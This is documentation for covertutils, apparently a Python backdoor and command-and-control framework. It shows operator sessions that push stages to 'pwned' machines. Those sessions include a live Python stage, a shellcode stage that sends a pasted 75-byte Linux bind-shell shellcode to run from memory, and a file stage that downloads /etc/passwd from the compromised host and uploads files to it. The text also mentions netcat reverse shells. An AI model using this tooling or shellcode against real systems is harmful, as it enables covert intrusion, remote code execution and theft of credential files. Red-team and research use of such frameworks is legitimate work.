Beyond the OS Shell

The covertutils package has an API for creating custom stages that can be dynamically loaded to compromised machines. If a covertutils.handlers.stageable.StageableHandler is running in a pwned machine stages can be pushed to it.

The API is fully documented in the Creating Custom Stages and Modules page.

The Python Stage

A Python shell with access to all internals is available.

The sent code runs directly in the covertutils stage API, so it is able to access the storage and storage['COMMON'] dictionaries and change internals objects at runtime.

Available Streams:
        [ 0] - control
        [ 1] - python
        [ 2] - os-shell
        [99] - EXIT
Select stream: 1
[python] >>>
[python] >>> print "Python module with access to the Stager API"
[python] >>> Python module with access to the Stager API

[python] >>> @
No special command specified!
Available special commands:
[python] >>> @storage

[python] >>> {'COMMON': {'handler': <covertutils.handlers.impl.standardshell.StandardShellHandler object at 0x7f6d472c9490>},
 'on': True,
 'queue': <Queue.Queue instance at 0x7f6d47066b90>}

[python] >>> if "indentation is found" :
[python] ...     print "The whole code block gets transmitted!"
[python] ...
[python] >>> The whole code block gets transmitted!

[python] >>>
[python] >>> print "@pyload command loads python files"
[python] >>> @pyload command loads python files

[python] >>> @pyload /tmp/
Buffer cleared!
File '/tmp/' loaded!
[python] >>> @show
print "This code exists in a file"

[python] >>>
[python] >>> This code exists in a file

[python] >>>

The Shellcode Stages

When one can directly run stuff in a process, why not run some shellcode too?

And do it directly from memory please!

Runnning shellcode requires the following things:

  • Acquiring the shellcode!
  • Copying it to memory, to a known memory location
  • Making that location executable at runtime
  • jmp ing to that location

So covertutils has 2 stages that utilize ctypes built-in package to do the right things and finally run shellcode! They are located under covertutils.payloads.linux.shellcode and

A SubShell is also available that translates copy-pasted shellcodes from various sources to raw data, before sending them over to a poor Agent.

(> !stage mload covertutils.payloads.linux.shellcode

Available Streams:
        [ 0] - control
        [ 1] - python
        [ 2] - os-shell
        [ 3] - shellcode
        [ 4] - stage
        [99] - EXIT
Select stream: 3
This shell will properly format shellcode
        pasted from sources like "" and "msfvenom"
[shellcode]> unsigned char code[]= \

Type 'GO' when done pasting...
[shellcode]> "\x6a\x66\x58\x99\x53\x43\x53\x6a\x02\x89\xe1\xcd\x80\x5b\x5e\x52"

Type 'GO' when done pasting...
[shellcode]> "\x66\x68\x11\x5c\x52\x6a\x02\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd"

Type 'GO' when done pasting...
[shellcode]> "\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93"

Type 'GO' when done pasting...
[shellcode]> "\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x2f\x2f\x73\x68\x68\x2f\x62"

Type 'GO' when done pasting...
[shellcode]> "\x69\x6e\x89\xe3\x50\x89\xe1\xb0\x0b\xcd\x80";

Type 'GO' when done pasting...
[shellcode]> GO

Type 'GO' when done pasting...
Pasted lines:
unsigned char code[]= \

Length of 75 bytes

Shellcode in HEX :

Shellcode in BINARY :

Send the shellcode over? [y/N] y

Oh, and on more thing! Shellcodes do no need to be Null Free (of course!). The string termination is on Python, and they are transmitted encrypted by design anyway.

The File Stage

What good is a backdoor if you can’t use it to leak files? Or even upload executables and that kind of stuff.

Actually, after the first smile when the pure netcat reverse shell oneliner returns, doing stuff with it becomes a pain really fast. And the next step is trying to wget stuff with the non-tty shell, or copy-pasting Base64 encoded files from the screen.

Miserable things happen when there aren’t specific commands for file upload/download to the compromised system. And out-of-band methods (pastebin, wget, etc) can easily be identified as abnormal…

The covertutils package has a file stage and subshell, to provide file transfers from the Agent to the Handler and vice-versa in an in-band manner (using the same Communication Channel).

Available Streams:
        [ 0] - control
        [ 1] - python
        [ 2] - os-shell
        [ 3] - file
        [ 4] - stage
        [99] - EXIT
Select stream: 3
=|file]> ~ help download
download <remote-file> [<location>]

=|file]> ~
=|file]> ~ download /etc/passwd
=|file]> ~ File downloaded!

=|file]> ~ download /etc/passwd renamed.txt
=|file]> ~ File downloaded!

=|file]> ~ help upload
upload  <local-file> [<remote-location>]

=|file]> ~
=|file]> ~ upload /etc/passwd myusers
=|file]> ~ File uploaded succesfully!

=|file]> ~
=|file]> ~ upload /etc/passwd
=|file]> ~ File uploaded succesfully!


Providing file transfer in-band is a double-edged knife.

If the Communication Channel is a TCP connection then files will flow around nicely (taking also advantage of the embedded compression, see: Compressor ). But if the Communication Channel is a covert TCP backdoor or such super-low-bandwidth channel, a 1MB file will take forever to download, taking over the whole channel. An out-of-band approach should be considered in this case.


Transfer of files can trigger the StreamIdentifier’s Birthday Problem (TODO: document it) destroying 1 or more streams (the control stream should still work to !control reset the connection). For heavy use of file transferring, a bigger tag_length should be used on the Orchestrator passed to the Handler object.